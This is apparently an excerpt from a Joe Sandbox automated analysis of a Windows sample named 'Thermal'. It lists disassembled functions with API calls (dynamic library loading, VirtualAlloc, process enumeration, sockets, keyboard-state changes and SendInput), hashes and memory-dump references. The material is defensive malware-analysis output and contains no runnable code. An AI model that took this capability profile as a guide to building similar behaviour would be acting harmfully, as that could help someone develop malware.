                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                • API String ID: 2574300362-1816364905
                                                • Opcode ID: 201d458a5440980e2ee2fd8f40bef48817541db2512243b2162742db15d25976
                                                • Instruction ID: b298d36120eef0f6e7878e64138de2cdee962b043cf72cad33ed92e282eaae7d
                                                • Opcode Fuzzy Hash: 201d458a5440980e2ee2fd8f40bef48817541db2512243b2162742db15d25976
                                                • Instruction Fuzzy Hash: 7FE0C73C2027528FE7214B2ACC4AB427BE8FF0C308F80842AE895C2350EB78C880CF10
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00784B44,?,007849D4,?,?,007827AF,?,00000001), ref: 00784B85
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00784B97
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: 9b7d6b496cb549bbe992b3e1d0f0cb0f9c1e5ee4c434afe68d0768ff2bbdef38
                                                • Instruction ID: 0cea723b86fed6c32d78db08ddfec1fb9084667129994cdf1f5a168d77be8704
                                                • Opcode Fuzzy Hash: 9b7d6b496cb549bbe992b3e1d0f0cb0f9c1e5ee4c434afe68d0768ff2bbdef38
                                                • Instruction Fuzzy Hash: 28D017B15557238FE721AF76EC18B067AE4BF05351F11882AD496E2690EAB8E880CB50
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00784AF7,?), ref: 00784BB8
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00784BCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: 7a7e62e3900ee16bef432e75afc1776080e71b9f1de72285bd4a149bd1a7e932
                                                • Instruction ID: 2fae4dabb900f4658f7fbb9c223e82081e86bcac2dda5aef91ed051fde4746e1
                                                • Opcode Fuzzy Hash: 7a7e62e3900ee16bef432e75afc1776080e71b9f1de72285bd4a149bd1a7e932
                                                • Instruction Fuzzy Hash: 0CD017B05547238FEB20AF75EC08B067AE5BF05351F119C6AD496D2A94EAB8D880CB50
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,007F1696), ref: 007F1455
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007F1467
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: 933416adf2e7777c635ec0db6a71a758f49b0751e46e8e782034576b415b0f51
                                                • Instruction ID: 4818c3445123f9efc58cd8af426533fd17e2c98c7872bd2508393ad0485e0992
                                                • Opcode Fuzzy Hash: 933416adf2e7777c635ec0db6a71a758f49b0751e46e8e782034576b415b0f51
                                                • Instruction Fuzzy Hash: F0D01730521722CFE7209F75D80972A76E4FF56395F11C82A94E6D22A0EB78D8C0CB50
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00785E3D), ref: 007855FE
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00785610
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 995963619c0270bb390f736bfa4acab92d1dbf669ef8c9e1951f35d6677c6da2
                                                • Instruction ID: 8d5b93e7c29d4c800e541c8b0cbc05b168a624ac0367de7f88f4f9d62c7fa1db
                                                • Opcode Fuzzy Hash: 995963619c0270bb390f736bfa4acab92d1dbf669ef8c9e1951f35d6677c6da2
                                                • Instruction Fuzzy Hash: 33D01774AA1B12CFE760AF75CC087167AE5BF05755F11882AD496D2291EA78C880CF90
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007E93DE,?,00800980), ref: 007E97D8
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007E97EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: 6d17d1718afc4aec347700b4909c47c0abbf243cd7eafc60d841c56a433baedd
                                                • Instruction ID: d4e06c467068833296e1bc5c39c108e2234382ffdfc6845fc93cd3a57ebe18e6
                                                • Opcode Fuzzy Hash: 6d17d1718afc4aec347700b4909c47c0abbf243cd7eafc60d841c56a433baedd
                                                • Instruction Fuzzy Hash: E4D012715117138FD7205F75DC8870676D4FF09391F11882AD895D2250EB78D480CA51
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 007EE7A7
                                                • CharLowerBuffW.USER32(?,?), ref: 007EE7EA
                                                  • Part of subcall function 007EDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007EDEAE
                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007EE9EA
                                                • _memmove.LIBCMT ref: 007EE9FD
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                • String ID:
                                                • API String ID: 3659485706-0
                                                • Opcode ID: 5a8d4b8f386f5100ce395229036590decbdb894da16480ef4638b2b216968b89
                                                • Instruction ID: e765216ec4f9ca4a607e7403709aa41e0fe0af70c1cbfb3e1eed6b7b4bd4d1a6
                                                • Opcode Fuzzy Hash: 5a8d4b8f386f5100ce395229036590decbdb894da16480ef4638b2b216968b89
                                                • Instruction Fuzzy Hash: CAC16871A08341CFC714DF29C48496ABBE4FF89714F04896EF8999B351D739E946CB82
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007E87AD
                                                • CoUninitialize.OLE32 ref: 007E87B8
                                                  • Part of subcall function 007FDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,007E8A0E,?,00000000), ref: 007FDF71
                                                • VariantInit.OLEAUT32(?), ref: 007E87C3
                                                • VariantClear.OLEAUT32(?), ref: 007E8A94
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                • String ID:
                                                • API String ID: 780911581-0
                                                • Opcode ID: c2d792c8ec45ea60b1f6beaa50453278df8ffba7ffa11dc5b023fab2fe458146
                                                • Instruction ID: 1172dac1823723ed9e4799e26140a218ea4e968bf1f9e792f7d7c88971ee276d
                                                • Opcode Fuzzy Hash: c2d792c8ec45ea60b1f6beaa50453278df8ffba7ffa11dc5b023fab2fe458146
                                                • Instruction Fuzzy Hash: 72A15875604B41DFCB50DF25C485B2AB7E5BF88354F148859FA999B3A2CB38ED00CB92
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8308
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8320
                                                • CLSIDFromProgID.OLE32(?,?,00000000,00800988,000000FF,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8345
                                                • _memcmp.LIBCMT ref: 007C8366
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                • Opcode ID: f94d86fe822a54bbea3b7d88ed229ff7b64ee1a682fac84f37e36700275df3ef
                                                • Instruction ID: 38e86e68464498fa2867b9f173dca789d827fcc89b40aa2e2da876e84ed40fd0
                                                • Opcode Fuzzy Hash: f94d86fe822a54bbea3b7d88ed229ff7b64ee1a682fac84f37e36700275df3ef
                                                • Instruction Fuzzy Hash: 3D813971A00109EFCB44DF94C888EEEB7B9FF89315F20855CE516AB250DB75AE06CB61
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: fad3587e79899327a2c5170298c9c31f8ca495c784c2d6fa484d974b08e1f1fc
                                                • Instruction ID: 6bf604dd1c1721854cf71ef40a147b87327eb3f2cd097511c39f48162fe2e531
                                                • Opcode Fuzzy Hash: fad3587e79899327a2c5170298c9c31f8ca495c784c2d6fa484d974b08e1f1fc
                                                • Instruction Fuzzy Hash: E1519630608B01DADB289F79D899F2DB7E5AF44350F20981FE556DB2A2EF789840CF15
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 007EF526
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 007EF534
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • Process32NextW.KERNEL32(00000000,?), ref: 007EF5F4
                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007EF603
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                • String ID:
                                                • API String ID: 2576544623-0
                                                • Opcode ID: 8289f4e3b76002fa47891ed790cd36ba7b44dda78efe2fe8205be23584ce0260
                                                • Instruction ID: 679d4d9b84fae71abb345d24d293b315d43795cdbec32158eb7ad356a02de0e7
                                                • Opcode Fuzzy Hash: 8289f4e3b76002fa47891ed790cd36ba7b44dda78efe2fe8205be23584ce0260
                                                • Instruction Fuzzy Hash: 9E518CB1104350EFD720EF24D88AE6BB7E8FF98740F40492DF595972A1EB74A905CB92
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                • Instruction ID: 374332d67bf968dd470128744807e6bddd3587abc3916c518d5d16611e0bbfdc
                                                • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                • Instruction Fuzzy Hash: 6041B531B00706ABDF288E69E884D6F77A6EF45360B24C27DE85587650EB78ED428B44
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007CA68A
                                                • __itow.LIBCMT ref: 007CA6BB
                                                  • Part of subcall function 007CA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007CA976
                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 007CA724
                                                • __itow.LIBCMT ref: 007CA77B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: 894a4c8fc2e06a31772f27456ee94fdfbe0271198c1bb6ecc99482c95a33e0ca
                                                • Instruction ID: 3d50ef3c217e30aa3c2a74854b38cf2a4a6bba96eb9ed5db4b403dd3ac604120
                                                • Opcode Fuzzy Hash: 894a4c8fc2e06a31772f27456ee94fdfbe0271198c1bb6ecc99482c95a33e0ca
                                                • Instruction Fuzzy Hash: 99419E70A4020CABDF10EF54C84AFEE7BB9EF48755F44006DF905A3281DB789A45CBA2
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 007E70BC
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E70CC
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007E7130
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E713C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                • String ID:
                                                • API String ID: 2214342067-0
                                                • Opcode ID: b74db70ecf1c376c0e31fb0260ea1a0a8e55e50df3589e12b2d93b13390eec35
                                                • Instruction ID: 5be08b5e75b51e4d42974ea1592303bccfdd89d97ea2c01bc75c49931ad33bf5
                                                • Opcode Fuzzy Hash: b74db70ecf1c376c0e31fb0260ea1a0a8e55e50df3589e12b2d93b13390eec35
                                                • Instruction Fuzzy Hash: FF41A071740200EFEB24AF24DC8AF2A77A4EB48B54F14C458FA599B3C2DB789C018B91
                                                APIs
                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00800980), ref: 007E6B92
                                                • _strlen.LIBCMT ref: 007E6BC4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID:
                                                • API String ID: 4218353326-0
                                                • Opcode ID: 5238b2d9fb95f0200bc44b5db80bc90a7bf82befc7abcf70955ad55e45839c81
                                                • Instruction ID: 14fe7995c5476f0ac637a27850c8c08175fa36dc24ae6d77e0ec607e9806ba31
                                                • Opcode Fuzzy Hash: 5238b2d9fb95f0200bc44b5db80bc90a7bf82befc7abcf70955ad55e45839c81
                                                • Instruction Fuzzy Hash: A641D671601144EBCB04FB65DC99FBEB3A9EF68350F248155F91A97292DF38AD01CB60
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007F8F03
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: c63a13a9907c8a12a080d3adbc4e0382371b0ae4dedf975f0c019e550bb8e256
                                                • Instruction ID: 7aa7f90cf277ab344e28cd42b57090c28fb1e3d22f0dce39d220e5e1a4d6ac7d
                                                • Opcode Fuzzy Hash: c63a13a9907c8a12a080d3adbc4e0382371b0ae4dedf975f0c019e550bb8e256
                                                • Instruction Fuzzy Hash: AA31BC3061420DEEEFA09B18CC49BB837E6FB06320F144911FB51E63A1CF79EA509A52
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 007FB1D2
                                                • GetWindowRect.USER32(?,?), ref: 007FB248
                                                • PtInRect.USER32(?,?,007FC6BC), ref: 007FB258
                                                • MessageBeep.USER32(00000000), ref: 007FB2C9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: c2361a711c3141d890d2b495c52aca8bdaf177a6f245188d14daa2771da8d8d7
                                                • Instruction ID: a3d7a3666b1aff95d9999c1fe53e68f0ccd39e4ad14fccb7c9045daf91177ac8
                                                • Opcode Fuzzy Hash: c2361a711c3141d890d2b495c52aca8bdaf177a6f245188d14daa2771da8d8d7
                                                • Instruction Fuzzy Hash: 2C416A70A04219DFDB21CF98C884BAD7BF5FB89311F1485A9EA189B361D734E841DF50
                                                APIs
                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007D1326
                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 007D1342
                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007D13A8
                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007D13FA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 4f534c5dfee41ea36c55e256cf3fae958f65bed089282c3ba2b5f3de2ddd559e
                                                • Instruction ID: 7bf1df79f5ea610c1d3e8cd0f576b6a2d597a388496665583bcaceb82ede4eb6
                                                • Opcode Fuzzy Hash: 4f534c5dfee41ea36c55e256cf3fae958f65bed089282c3ba2b5f3de2ddd559e
                                                • Instruction Fuzzy Hash: 60310770E40258BEFF348A658C09BFE7BB9AB45320F84421BE490627D1D37C89519BA1
                                                APIs
